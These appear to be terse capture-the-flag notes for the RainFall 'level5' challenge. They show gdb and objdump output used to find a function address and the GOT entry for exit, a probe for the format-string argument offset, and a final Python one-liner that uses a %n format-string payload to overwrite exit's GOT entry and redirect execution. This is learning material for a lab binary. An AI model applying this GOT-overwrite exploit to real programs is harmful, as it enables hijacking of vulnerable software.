Getting the adress of run


(gdb) run
Starting program: /home/user/level5/level5 


[Inferior 1 (process 3471) exited with code 01]
(gdb) p o
$1 = {<text variable, no debug info>} 0x80484a4 <o>  = 134513828


Getting the adress of the got entry of exit

level5@RainFall:~$ objdump -R level5 | grep exit
08049828 R_386_JUMP_SLOT   _exit
08049838 R_386_JUMP_SLOT   exit  


Get the adress of the first print argument :
python -c 'print ("0000 " + "%x " * 20)' | ./level5
0000 200 b7fd1ac0 b7ff37d0 30303030 20782520 25207825  # The 4th


(python -c 'print "\x38\x98\x04\x08" + "%134513828d%4$n"' && cat) | ./level5
